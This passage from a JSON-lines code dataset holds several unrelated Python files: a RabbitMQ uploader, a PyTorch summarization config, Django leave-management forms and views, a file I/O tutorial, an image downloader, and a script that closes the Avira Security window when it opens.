self.username = self.readConfigFile('username')\r\n self.password = self.readConfigFile('password')\r\n self.rabbithost = self.readConfigFile('rabbit_host')\r\n self.virtual_host = self.readConfigFile('virtual_host')\r\n self.queue = self.readConfigFile('queue')\r\n self.exchange = self.readConfigFile('exchange')\r\n self.routing_key = self.readConfigFile('routing_key')\r\n try:\r\n credentials = pika.PlainCredentials(self.username, self.password)\r\n parameters = pika.ConnectionParameters(host=self.rabbithost,virtual_host=self.virtual_host,credentials=credentials)\r\n self.connection = pika.BlockingConnection(parameters)\r\n except Exception as e:\r\n self.add2log(\"Unable to create dirq channgel, exception was %s, \" % (e))\r\n\r\n\r\n # Publish summaries to Mq\r\n def publishSToMq(self, arguments, event_types, summaries, summaries_data):\r\n # the max size limit in KB but python expects it in bytes\r\n size_limit = self.maxMQmessageSize * 1000\r\n for event in summaries_data.keys():\r\n if not summaries_data[event]:\r\n continue\r\n msg_head = { 'input-source' : arguments['input_source'],\r\n 'input-destination' : arguments['input_destination'],\r\n 'event-type' : event,\r\n 'rsv-timestamp' : \"%s\" % time.time(),\r\n 'summaries' : 1,\r\n 'destination' : '/topic/perfsonar.summary.' + event }\r\n msg_body = { 'meta': arguments }\r\n msg_body['summaries'] = summaries_data[event]\r\n #msg = Message(body=json.dumps(msg_body), header=msg_head)\r\n self.SendMessagetoMQ(msg_body)\r\n\r\n def SendMessagetoMQ(self, msg_body):\r\n # the max size limit in KB but python expects it in bytes \r\n size_limit = self.maxMQmessageSize * 1000\r\n channel = self.connection.channel()\r\n channel.queue_declare(queue=self.queue,durable=True)\r\n ch_prop = pika.BasicProperties(delivery_mode = 2) #Make message persistent\r\n size_msg = sys.getsizeof(json.dumps(msg_body))\r\n # if size of the message is larger than 10MB discarrd \r\n if size_msg > size_limit:\r\n self.add2log(\"Size of message body bigger than limit, discarding\")\r\n channel.close()\r\n return\r\n # add to mq \r\n try:\r\n result = channel.basic_publish(exchange = self.exchange,\r\n routing_key = self.routing_key,\r\n body = json.dumps(msg_body), \r\n properties = ch_prop)\r\n if not result:\r\n raise Exception('Exception publishing to rabbit MQ', 'Problem publishing to mq')\r\n except Exception as e:\r\n self.add2log(\"ERROR: Failed to send message to mq, exception was %s\" % (e))\r\n channel.close()\r\n\r\n # Publish message to Mq\r\n def publishRToMq(self, arguments, event_types, datapoints):\r\n for event in datapoints.keys():\r\n # filter events for mq (must be subset of the probe's filter)\r\n if event not in self.allowedEvents:\r\n continue\r\n # skip events that have no datapoints \r\n if not datapoints[event]:\r\n continue\r\n # compose msg\r\n msg_head = { 'input-source' : arguments['input_source'],\r\n 'input-destination' : arguments['input_destination'],\r\n 'event-type' : event,\r\n 'rsv-timestamp' : \"%s\" % time.time(),\r\n 'summaries' : 0,\r\n 'destination' : '/topic/perfsonar.raw.' + event}\r\n msg_body = { 'meta': arguments }\r\n msg_body['datapoints'] = datapoints[event]\r\n self.SendMessagetoMQ(msg_body)\r\n \r\n\r\n def postData(self, arguments, event_types, summaries, summaries_data, metadata_key, datapoints):\r\n summary= self.summary\r\n disp = self.debug\r\n lenght_post = -1\r\n for event_type in datapoints.keys():\r\n if len(datapoints[event_type])>lenght_post:\r\n lenght_post = len(datapoints[event_type])\r\n if lenght_post == 0:\r\n self.add2log(\"No new datapoints skipping posting for efficiency\")\r\n return\r\n if summaries_data:\r\n self.add2log(\"posting new summaries\")\r\n self.publishSToMq(arguments, event_types, summaries, summaries_data)\r\n step_size = 100\r\n for step in range(0, lenght_post, step_size):\r\n chunk_datapoints = {}\r\n for event_type in datapoints.keys():\r\n chunk_datapoints[event_type] = {}\r\n if len(datapoints[event_type].keys())>0:\r\n pointsconsider = sorted(datapoints[event_type].keys())[step:step+step_size]\r\n for point in pointsconsider:\r\n chunk_datapoints[event_type][point] = datapoints[event_type][point]\r\n if True:\r\n self.publishRToMq(arguments, event_types, chunk_datapoints)\r\n # Updating the checkpoint files for each host/metric and metadata\r\n for event_type in datapoints.keys():\r\n if len(datapoints[event_type].keys()) > 0:\r\n if event_type not in self.time_starts:\r\n self.time_starts[event_type] = 0\r\n next_time_start = max(datapoints[event_type].keys())+1\r\n if next_time_start > self.time_starts[event_type]:\r\n self.time_starts[event_type] = int(next_time_start)\r\n f = open(self.tmpDir + metadata_key, 'w')\r\n f.write(json.dumps(self.time_starts))\r\n f.close()\r\n self.add2log(\"posting NEW METADATA/DATA to esmondmq %s\" % metadata_key)\r\n \r\n","sub_path":"libexec/probes/worker-scripts/uploader/rabbitmquploader.py","file_name":"rabbitmquploader.py","file_ext":"py","file_size_in_byte":6681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"317027596","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : Mon Dec 24 10:30:29 2018\n# @Author : JRP - Ruipeng Jia\n\nimport argparse, os\nimport torch\n\n\nhome = os.getenv('HOME')\n\n\nclass Config():\n home = home\n\n ## Vocabulary && Sentence\n SENTENCE_START = ''\n SENTENCE_END = ''\n # and are used in the data files to segment the abstracts into sentences. They don't receive vocab ids.\n\n # BOS = \"\" # This has a vocab id, which is used at the start of every decoder input sequence\n # EOS = \"\" # This has a vocab id, which is used at the end of untruncated target sequences\n # PAD_TOKEN = \"\" # This has a vocab id, which is used to pad the encoder input, decoder input and target sequence\n # UNKNOWN_TOKEN = \"\" # This has a vocab id, which is used to represent out-of-vocabulary words\n # # Note: none of , , , , , should appear in the vocab file.\n # pad_id = 0 # mask will need pad_idx to be 0\n # unk_id = 1\n # bos_id = 2\n # eos_id = 3\n\n ## Misc\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n cov_loss_wt = 1.0\n\n ## Path\n tmp_path = \"./tmp/\" # store all result\n\n\nopt = Config()\nparser = argparse.ArgumentParser(description='JARVIS')\n\n## learning\nparser.add_argument('-lr', type=float, default=0.001, help='initial learning rate [default: 0.0003]')\nparser.add_argument('-epochs', type=int, default=100, help='number of epochs for train [default: 100]')\nparser.add_argument('-optimizer', type=str, default='adam', help='[default: adam]')\nparser.add_argument('-initializer', type=str, default='xavier_uniform_', help='[default: xavier_uniform_]')\nparser.add_argument('-batch_size', type=int, default=8, help='batch size for training [default: 8]')\nparser.add_argument('-bucket_cache_size', type=int, default=1, help='bucket size for training [default: 1]')\nparser.add_argument('-max_grad_norm', type=float, default=2.0, help='max grad norm [default: 2.0]')\nparser.add_argument('-eps', type=float, default=1e-9, help='[default: 1e-9]')\n\n## evaluate\nparser.add_argument('-is_eval', action='store_true', default=False, help='for test to disable dropout and batch_normalization [default: False]')\nparser.add_argument('-log_interval', type=int, default=20, help='how many iters to wait before logging training status [default: 20]')\nparser.add_argument('-test_interval', type=int, default=2000, help='how many iters to wait before testing, shoule be times of log_interval [default: 2000]')\nparser.add_argument('-load_iter', type=int, default=None, help='[default: None]')\nparser.add_argument('-beam_size', type=int, default=5, help='beam size for test [default: 5]')\nparser.add_argument('-test_num', type=int, default=None, help='number of example for test [default: None]')\nparser.add_argument('-train_num', type=int, default=None, help='number of example for train [default: None]')\n\n## limitation\nparser.add_argument('-max_vocab_size', type=int, default=30000, help='vocabulary size of this model [default: 30000]')\nparser.add_argument('-max_iter', type=int, default=None, help='[default: 500000]')\n# for dataset.py to filter the example\nparser.add_argument('-min_source_length', type=int, default=None, help='used to filter original source data [default: None]')\nparser.add_argument('-max_source_length', type=int, default=None, help='used to filter original source data [default: None]')\nparser.add_argument('-min_target_length', type=int, default=None, help='used to filter original target data [default: None]')\nparser.add_argument('-max_target_length', type=int, default=None, help='used to filter original target data [default: None]')\n# for example.py etc. to truncate input; just use max_decoder_steps\nparser.add_argument('-min_encoder_steps', type=int, default=0, help='used to cut sentence to shorter length [default: 0]')\nparser.add_argument('-max_encoder_steps', type=int, default=400, help='used to cut sentence to shorter length [default: 400]')\nparser.add_argument('-min_decoder_steps', type=int, default=0, help='[default: 0]')\nparser.add_argument('-max_decoder_steps', type=int, default=100, help='[default: 100]')\n\nparser.add_argument('-max_keep', type=int, default=20, help='[default: 20]')\nparser.add_argument('-textrank_words', type=int, default=None, help='[default: None]')\nparser.add_argument('-textrank_ratio', type=float, default=0.4, help='[default: 0.4]')\n\n## data\nparser.add_argument('-corpus', type=str, default='data_simple', help='corpus to be trained [default: data_simple], alternative: [\"data_simple\", \"gigaword\", \"byte_cup_2018\"]')\nparser.add_argument('-shuffle', action='store_true', default=False, help='shuffle the data every epoch')\n\n## model\nparser.add_argument('-model', type=str, default='RNN', help='model to train')\nparser.add_argument('-layer', type=str, default='GRU', help='model layer to train')\nparser.add_argument('-dropout', type=float, default=0.0, help='the probability for dropout [default: 0.0]')\nparser.add_argument('-weight_decay', type=float, default=0.0, help='L2 [default: 0.0]')\nparser.add_argument('-clip', type=float, default=2.0, help='clip in optimizer [default: 2.0]')\nparser.add_argument('-num_layers', type=int, default=1, help='number of hidden layers [default: 1]')\nparser.add_argument('-kernel_num', type=int, default=100, help='number of each kind of kernel [default: 100]')\nparser.add_argument('-kernel_sizes', type=str, default='3,5,7', help='comma-separated kernel size to use for convolution [default: 3,5,7]')\nparser.add_argument('-freeze', action='store_true', default=False, help='freeze the embedding')\n\n## dimension\nparser.add_argument('-embed_dim', type=int, default=128, help='number of embedding dimension, will auto load Glove vector of that dim [default: 100], alternative: [25, 50, 100, 200]')\nparser.add_argument('-hidden_dim', type=int, default=256, help='number of hidden dimension [default: 512]')\nparser.add_argument('-pos_dim', type=int, default=50, help=\"sentence/word position to a vector\")\nparser.add_argument('-pos_num', type=int, default=40, help=\"sentence number in a document and word number in a sentence\")\nparser.add_argument('-seg_num', type=int, default=10, help=\"realtive sentence position in a document\")\n\n## device\nparser.add_argument('-device_id', type=int, default=1, help='device to use for iterate data, -1 mean cpu [default: 1]')\nparser.add_argument('-no_cuda', action='store_true', default=False, help='disable the gpu')\n\n## extend\nparser.add_argument('-attention_mask', action='store_true', default=False, help='whether to use attention mask [default: False]')\nparser.add_argument('-teacher_forcing', action='store_true', default=False, help='whether to use teacher forcing [default: False]')\nparser.add_argument('-teacher_forcing_ratio', type=float, default=0.5, help='the ratio for teacher forcing [default: 0.5]')\nparser.add_argument('-pointer', action='store_true', default=False, help='whether to use pointer-generator [default: False]')\nparser.add_argument('-coverage', action='store_true', default=False, help='whether to use coverage [default: False]')\nparser.add_argument('-prior_dist', action='store_true', default=False, help='whether to use prior distribution [default: False]')\nparser.add_argument('-restrict_hidden', action='store_true', default=False, help='whether to restrict hidden [default: False]')\nparser.add_argument('-multi_head_attention', action='store_true', default=False, help='whether to use Multi-Head Attention [default: False]')\nparser.add_argument('-multi_head_attention_head', type=int, default=8, help='the head number in Multi-Head Attention [default: 8]')\nparser.add_argument('-word_vec', type=str, default=None, help='word vector path [default: None], alternative: [glove_twitter, glove_common, glove_wiki, google_news, sgns_weibo]')\nparser.add_argument('-bert', action='store_true', default=False, help='whether to use BERT [default: False]')\nparser.add_argument('-gpt2', action='store_true', default=False, help='whether to use GPT2 [default: False]')\nparser.add_argument('-orthogonal', action='store_true', default=False, help='whether to orthogonal [default: False]')\nparser.add_argument('-textrank', action='store_true', default=False, help='whether to use textrank [default: False]')\n\n## Misc\n# parser.add_argument('-original_result', action='store_true', default=False, help='for paper result [default: False]')\nparser.add_argument('-dataset_sample_size', type=int, default=100, help='[default: 100]') # generate little dataset from big dataset for running quickly\nparser.add_argument('-log', type=str, default='log', help='path to store log [default: log]')\nparser.add_argument('-contest', action='store_true', default=False, help='whether in contest [default: False]')\n\n\n## Process\n# parser.add_argument('-target_split', action='store_true', default=False, help='[default: False]')\n# parser.add_argument('-source_split', action='store_true', default=False, help='[default: False]')\n\nargs = parser.parse_args()\n\n## word vec\nword_vec_path = {\n None: None,\n 'glove_common_300d': home + '/datasets/WordVec/Glove_Common_Crawl_42B_300D/glove.42B.300d.txt',\n 'glove_twitter_25d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.25d.txt',\n 'glove_twitter_50d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.50d.txt',\n 'glove_twitter_100d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.100d.txt',\n 'glove_twitter_200d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.200d.txt',\n 'glove_wiki_50d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.50d.txt',\n 'glove_wiki_100d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.100d.txt',\n 'glove_wiki_200d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.200d.txt',\n 'glove_wiki_300d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.300d.txt',\n 'google_news_300d': home + '/datasets/WordVec/GoogleNews/GoogleNews-vectors-negative300',\n 'fasttext_wiki-news_300d': home + '/datasets/WordVec/fastText/wiki-news-300d-1M.vec',\n 'sgns_weibo_300d': home + '/datasets/WordVec/sgns.weibo.word'\n}\nargs.word_vec_path = word_vec_path[args.word_vec]\n\nif args.bert:\n # args.embed_dim = 1024 # large\n args.embed_dim = 768 # base\nif args.gpt2:\n args.embed_dim = 768\n\n## path\nargs.corpus_path = opt.tmp_path + args.corpus + '/'\nargs.dataset_file_path = args.corpus_path + 'dataset/'\nargs.vocab_file = args.corpus_path + 'vocab.pkl'\n\nargs.log_path = args.corpus_path + args.log + '/'\nargs.beam_dir = args.log_path + 'beam/'\nargs.save_dir = args.log_path + 'checkpoint/'\nargs.selector_save_dir = args.log_path + 'selector_checkpoint/'\nargs.summary_dir = args.log_path + 'summary/'\nargs.selector_summary_dir = args.log_path + 'selector_summary/'\nargs.eval_dir = args.log_path + 'eval/'\n\nfor path in [args.dataset_file_path, args.log_path, args.beam_dir, \\\n args.save_dir, args.selector_save_dir, \\\n args.summary_dir, args.selector_summary_dir, \\\n args.eval_dir]:\n if not os.path.exists(path):\n os.makedirs(path)\n\nargs.BOS = \"\"\nargs.EOS = \"\"\nargs.PAD_TOKEN = \"\"\nargs.UNKNOWN_TOKEN = \"\"\nargs.pad_id = 0\nargs.unk_id = 1\nargs.bos_id = 2\nargs.eos_id = 3\n\n\nif args.no_cuda:\n opt.device = torch.device('cpu')\n\nif opt.device == torch.device('cuda'):\n torch.cuda.set_device(args.device_id)\n\nif __name__ == '__main__':\n print(args.BOS) # \n print(opt.device)\n setattr(opt, 'model_name', 'cnn'); print(opt.model_name)\n print(args.dataset_file_path)\n print(args.max_vocab_size)\n print(args.attention_mask)\n print(args.beam_dir)\n print(args.save_dir)\n\n from preview import preview_args\n print(preview_args(args))\n","sub_path":"bin/template/src/jptproject/l5_2018_12_Pytorch_Summarization_with_Pointer-Generator_Networks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"414181201","text":"\"\"\"Giving the time slot list to users\"\"\"\ndictionary_name={1:\"9 am\",2:\"11 am\",3:\"12.30pm\",4:\"3pm\",5:\"7pm\",6:\"9pm\"}\nnew_dic={}\n\nclass Meeting:\n \"\"\"A class to do the functions of assigning a time slot\"\"\"\n \n def time_view():\n \"\"\"A function to check if the time slot is available\"\"\"\n \n mine=int(input(\"Enter time slot you want:\"))\n if mine in dictionary_name.keys():\n new_dic.update({mine:dictionary_name[mine]})\n del dictionary_name[mine]\n else:\n print(\"Enter proper time slot\")\n return new_dic\n\n def free():\n \"\"\"A function to return the updated dictionary\"\"\"\n return dictionary_name\n\n \n\ndef main():\n \"\"\"main function to prompt the input from users\"\"\"\n while True:\n print(\"1. Alot 2. Remaining Slots 3.exit\")\n a=int(input(\"Enter your choice:\"))\n if a==1:\n x=Meeting.time_view()\n print(\"Alotted slot is :\",x)\n elif a==2:\n y=Meeting.free()\n print(\"Free slots are:\",y)\n else:\n break\n\nmain()\n \n","sub_path":"meeting.py","file_name":"meeting.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"186153828","text":"\"\"\" This module contains classes and functions for Django forms.\n\"\"\"\n\nfrom django import forms\nfrom league import handlers\nimport league.choices as league_choices\nimport league.regions as league_regions\n\nclass StatsQueryForm(forms.Form):\n \"\"\" Form for querying player stats.\n \"\"\"\n\n def __init__(self, handler, *args, **kwargs):\n super(StatsQueryForm, self).__init__(*args, **kwargs)\n self.handler = handler\n\n # set field attributes that requires handler\n years = range(2013, self.handler.league.year + 1)\n teams = sorted(self.handler.TeamModel.objects.all(),\n key=lambda t: t.name)\n self.fields[\"team\"].choices = [('all', 'ALL')] \\\n + [(t.slug,t.name) for t in teams]\n self.fields[\"year\"].choices = [('all', 'ALL')] \\\n + [(i, i) for i in years]\n self.fields[\"gameday\"].choices = [('all', 'ALL')] \\\n + [(i, i) for i in range(40)]\n\n # add form fields\n team = forms.ChoiceField(required=False)\n year = forms.ChoiceField(required=False)\n gameday = forms.ChoiceField(required=False)\n cumulative_stats = forms.BooleanField(required=False)\n\n def get_teams(self):\n \"\"\" Returns a list of all teams that user requested.\n\n Returns\n -------\n val : QuerySet\n A list of Team models for each team.\n \"\"\"\n val = self.cleaned_data[\"team\"]\n if not val == \"all\":\n return self.handler.TeamModel.objects.filter(slug=val)\n else:\n return self.handler.TeamModel.objects.all()\n\n def _get_years(self):\n \"\"\" Returns a list of all years that user requested.\n\n Returns\n -------\n val : list\n A list of int for each year.\n \"\"\"\n val = self.cleaned_data[\"year\"]\n if not val == \"all\":\n return [val]\n else:\n return [i for i,j in self.fields[\"year\"].choices[1:]]\n\n def _get_gamedays(self):\n \"\"\" Returns a list of all gamedays that user requested.\n\n Returns\n -------\n val : list\n A list of int for each gameday.\n \"\"\"\n val = self.cleaned_data[\"gameday\"]\n if not val == \"all\":\n return [val]\n else:\n return [i for i,j in self.fields[\"gameday\"].choices[1:]]\n\n def _get_cumulative_stats(self):\n \"\"\" Returns a boolean if user requested to get the cumulative stats.\n\n Returns\n -------\n val : bool\n Returns True if user wanted cumulative stats, else False.\n \"\"\"\n return self.cleaned_data[\"cumulative_stats\"]\n\n def get_playerstats(self):\n \"\"\" Returns all the PlayerStat models that user requested.\n\n Returns\n -------\n playerstats : list\n A list of PlayerStat models.\n \"\"\"\n\n # check if form has user data\n if not hasattr(self, \"cleaned_data\"):\n return []\n\n # get user inputs\n teams = self._get_teams()\n years = self._get_years()\n gamedays = self._get_gamedays()\n cumlative_stats = self._get_cumulative_stats()\n\n # set arguments for database query\n kwargs = {}\n if len(years) == 1:\n kwargs[\"game__year\"] = years[0]\n if len(gamedays) == 1:\n kwargs[\"game__gameday\"] = gamedays[0]\n\n # get PlayerStat models\n playerstats = []\n for team in teams:\n for player in team.players.all():\n playerstats += player.playerstats.filter(**kwargs)\n\n return playerstats\n\nclass PipelineStateForm(forms.Form):\n \"\"\" Form for choosing pipeline state.\n \"\"\"\n def __init__(self, team, *args, **kwargs):\n super(PipelineStateForm, self).__init__(*args, **kwargs)\n states = [team.state] + league_regions.states_map[team.state]\n state_names = dict(league_choices.states)\n c = [(state, state_names[state]) for state in states]\n self.fields[\"pipeline_state\"].choices = c\n\n pipeline_state = forms.ChoiceField(required=True,\n choices=league_choices.states)\n\nclass HostCampStateForm(forms.Form):\n \"\"\" Form for choosing host camp state.\n \"\"\"\n\n def __init__(self, team, *args, **kwargs):\n super(HostCampStateForm, self).__init__(*args, **kwargs)\n handler = handlers.LeagueHandler(team.league.slug)\n conference = \"acc\" if team.conference == \"acc-affiliated\" \\\n else team.conference\n conf_teams = handler.TeamModel.objects.filter(\n conference=conference)\n state_names = dict(league_choices.states)\n c = [(conf_team.state, state_names[conf_team.state])\n for conf_team in conf_teams if conf_team.state != team.state]\n self.fields[\"host_camp_state\"].choices = c\n\n host_camp_state = forms.ChoiceField(required=True)\n\n\n\nclass PracticeForm(forms.Form):\n \"\"\" Form for choosing practice options.\n \"\"\"\n offense = forms.ChoiceField(required=True,\n choices=[(\"Syracuse\", \"Syracuse\")])\n defense = forms.ChoiceField(required=True,\n choices=[(\"Pittsburgh\", \"Pittsburgh\")])\n offensive_play = forms.ChoiceField(required=True,\n choices=[(\"rb_dive\", \"rb_dive\")])\n defensive_play = forms.ChoiceField(required=True,\n choices=[(\"threefour_man_mid_blitz\",\n \"threefour_man_mid_blitz\")])\n\n\n","sub_path":"league/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"478796139","text":"\nfrom config import common\n\nclass Route(object):\n \"\"\" 把每个URL与Handler的关系保存到一个元组中,然后追加到列表内,列表内包含了所有的Handler \"\"\"\n\n def __init__(self):\n self.urls = list() # 路由列表\n\n def __call__(self, url=None, *args, **kwargs):\n def register(cls):\n\n urlnew = \"/{}{}/{}/{}/{}\".format(\n common.get(\"version\", \"v1\"),\n common.get(\"api_base\", \"/api\"),\n str(cls).split('.')[1],\n str(cls).split('.')[2],\n cls.__name__ if not url else url.replace('/',''),\n )\n self.urls.append((urlnew, cls)) # 把路由的对应关系表添加到路由列表中\n if kwargs.get(\"id\",None):\n self.urls.append((\"{}/{}\".format(urlnew,\"(.*)\"), cls))\n return cls\n\n return register\n\nroute = Route()\n\n\n\n","sub_path":"router/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"19751691","text":"#coding=utf-8\n#文本文件只能是用记事本打开的。wor编辑的文档是二进制文件,还包括视频、图片\n\n# open(,param),param有属性 r w a b(二进制文件) +(读和写两种模式) b和+都是可以和两外几种组合,+的用法是 a+ w+ r+ ...\n#win操作系统默认是编码是 GBK;linux系统文件编码使用的是 utf-8\nf = open('t.txt','a',encoding='GBk') #保存时使用的编码格式\nf.write('测试')\nf.close()\n\n# with上下文管理器:不论什么原因跳出with块,都能确保文件关闭,执行完之后回到之前的现场\ns = [\"张三\\n\",'李四','王五\\n'] #列表可以被写入,\\n被自动转为换行\nwith open('E:\\Pycoding\\log.txt','a') as f:\n f.writelines(s) #write()不能 写list,但也是写入后换行\n\n#按照字节读取文件\nwith open('E:\\Pycoding\\log.txt','r') as f:\n print(f.read(4)) #读取文件,按照字符个数,不写默认读取整个文件\n#按照行读取文件,读取到文件末尾返回空串\nwith open('E:\\Pycoding\\log.txt','r') as f:\n while True:\n fragment = f.readline()\n if not fragment:\n break\n else:\n print(fragment,end=' ')\n#按照行读取文件,每一行的内容作为一个字符串,放在列表中,最后返回一个列表\nwith open('E:\\Pycoding\\log.txt','r') as f:\n print(f.readlines())\n\n#也可以这样按行读取:使用迭代器,每次返回一行\nwith open('E:\\Pycoding\\log.txt','r') as f:\n for st in f:\n print(st,end=' ')\n\n#文件对象的一些属性:\nwith open('log.txt','rb') as f:\n print('文件名称是:{0}'.format(f.name)) #文件名:name\n print(f.tell()) # tell()返回文件指针的当前位置\n print(f.readline())\n print(f.tell())#读取一行后指针在文件中的位置,GBK中汉字占3个字节tell按照字节来的\n print(f.seek(-10,2)) #有时候这个会经常报错,因为没有用二进制格式打开的文件之只支持,从头的位置进行读取。\n #在模式中加上b的格式就可以了使用另外两种模式了\n","sub_path":"Pycoding/27_文件.py","file_name":"27_文件.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"580736343","text":"import sys\nimport pywinauto\nfrom pywinauto import Desktop, Application\nimport time\nimport os\nimport pythoncom\nfrom threading import *\nimport time\nimport wmi\nimport keyboard\n\n\n\n\"\"\"Name\tPID\tStatus\tUser name\tCPU\tMemory (active private working set)\tArchitecture\tDescription\nAvira.Spotlight.UI.Application.exe\t13192\tRunning\tCarlos Moreno\t00 \t69,136 K\tx86\tAvira Security\n\"\"\"\ndef closeAvira():\n try:\n app = Application(backend=\"uia\").connect(path=\"Avira.Spotlight.UI.Application.exe\")\n print(\"conected to avira\")\n print(app.windows())\n \n if app.window(title = \"Avira Security\"):\n Desktop(backend=\"uia\").window(title=\"Avira Security\").close()\n print(\"Dispachet\")\n\n # dlg = app[\"Avira Security\"]\n # print(dlg.print_control_identifiers()) #btnWindowClose or btnOverLayClose\n # window = dlg.window(auto_id=\"AppWindow\")\n # window.click(auto_id=\"btnWindowClose\")\n except pywinauto.application.ProcessNotFoundError:\n print(\"Process not found\")\n\n\ndef listener():\n pythoncom.CoInitialize()\n print(pythoncom)\n c = wmi.WMI()\n print(c)\n process_watcher = c.Win32_Process.watch_for(\"creation\")\n while True:\n new_process = process_watcher()\n print(new_process)\n if new_process.Caption == \"Avira.Spotlight.UI.Application.exe\":\n print(\"send to close\")\n time.sleep(3)\n closeAvira()\n \n\ndef keyboardShortcut():\n while True:\n if keyboard.is_pressed(\"q\"):\n print(\"ending program\")\n sys.exit()\n \n\nif __name__ == '__main__': \n t = Thread(target=listener)\n keyboardWatcher = Thread(target=keyboardShortcut)\n # t.setDaemon(True)\n t.daemon = True\n keyboardWatcher.start()\n t.start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"170906955","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nimport pandas as pd\r\nimport urllib.request\r\nimport os \r\n#Define the name of directory \r\nf_name = \"Zillow\"\r\n\r\n# Create the directory name where the images will be saved\r\nbase_dir = os.getcwd()\r\ndir_name = (f_name.split('/')[-1]).split('.')[0]\r\ndir_name\r\ndir_path = os.path.join(base_dir, dir_name)\r\n\r\n#Create the directory if already not there\r\nif not os.path.exists(dir_path):\r\n os.mkdir(dir_path)\r\n\r\n# Read the csv with links to all the image pages\r\nos.getcwd()\r\ndf = pd.read_csv(\"picture_links.csv\")\r\ndf.columns\r\nlinks=df.Picture_links\r\n\r\n# Function to take an image url and save the image in the given directory\r\ndef download_image(url,image_number):\r\n print(\"[INFO] downloading {}\".format(url))\r\n name = f\"Pic_{image_number}.jpg\" #File name that will be saved\r\n try:\r\n opener=urllib.request.build_opener()\r\n opener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\r\n urllib.request.install_opener(opener)\r\n urllib.request.urlretrieve(url,os.path.join(dir_path, name))\r\n except Exception as error:\r\n print (\"[~] Error Occured with %s : %s\" % (name, error))\r\n \r\n \r\n# Print the number of images\r\nprint (\"[INFO] Downloading {} images\".format(len(links)))\r\n#Download ALL image in URL links list\r\nj=1 \r\nfor i in links[:465]:\r\n print (j)\r\n download_image(i,j)\r\n j+=1\r\n","sub_path":"Download_image.py","file_name":"Download_image.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"134228886","text":"from django.shortcuts import render,redirect\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import View, TemplateView, ListView, DetailView, CreateView, DeleteView\nfrom django.views.generic.edit import UpdateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom . import models\nfrom . import forms\nfrom django.utils import timezone\nfrom datetime import datetime\nfrom django.http import HttpResponseForbidden,Http404\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode,urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom employee.tokens import account_activation_token\n\nfrom django.utils.encoding import force_text\nfrom django.contrib.auth.tokens import default_token_generator\n\nfrom django.core.mail import EmailMessage\nfrom django.http import HttpResponse\nimport string\nfrom django.http import JsonResponse\nfrom django.db.models import Count\n\n# Create your views here.\nclass List(LoginRequiredMixin,ListView):\n model = models.LeaveRules\n template_name = 'leave/leave_rules_list.html'\n\nclass LeaveRulesDeleteView(DeleteView):\n model = models.LeaveRules\n success_url = reverse_lazy(\"leave:list\")\n\nclass LeaveRulesCreateView(LoginRequiredMixin,CreateView):\n form_class = forms.LeaveRulesForm\n template_name = 'leave/leave_rules_form.html'\n success_url = reverse_lazy(\"leave:list\")\n\nclass LeaveRulesDetail(LoginRequiredMixin,DetailView):\n model = models.LeaveRules\n template_name = 'leave/leave_rules_detail.html'\n\n def get_queryset(self):\n queryset = super().get_queryset()\n return queryset.filter(pk__iexact=self.kwargs.get('pk'))\n\nclass LeaveRulesUpdateView(LoginRequiredMixin,UpdateView):\n model = models.LeaveRules\n fields = ('leave_type','leave_rules')\n template_name = 'leave/leave_rules_form.html'\n # success_url = reverse_lazy(\"leave:detail\" pk=leaverules.pk)\n success_url = reverse_lazy(\"leave:list\")\n\nclass LeaveApplyCreateView(LoginRequiredMixin,CreateView):\n form_class = forms.LeaveApplyForm\n template_name = 'leave/leave_apply_form.html'\n success_url = reverse_lazy(\"leave:list\")\n\n def post(self, request, *args, **kwargs):\n registered = False\n\n if request.method == 'POST':\n leave_form = forms.LeaveApplyForm(data=request.POST)\n draft = request.POST.get('save', False)\n\n if leave_form.is_valid():\n leave = leave_form.save(commit=False)\n leave.user = request.user\n flag = 1\n if draft != 'Save':\n leave.published_date = timezone.now()\n leave.save()\n flag = leave_send_mails(request,leave.id)\n else:\n leave.save()\n registered = True\n if flag != 1:\n return redirect('leave:applied')\n else:\n return redirect('leave:draft', username=request.user.username)\n\n else:\n print(leave_form.errors)\n else:\n leave_form = self.form_class\n\n return render(request,self.template_name,\n {'form':leave_form,\n 'registered':registered})\n\nclass LeaveAppliedListView(LoginRequiredMixin,ListView,BaseException):\n model = models.LeaveApply\n template_name = 'leave/leave_apply_status_list.html'\n\n def get_queryset(self):\n 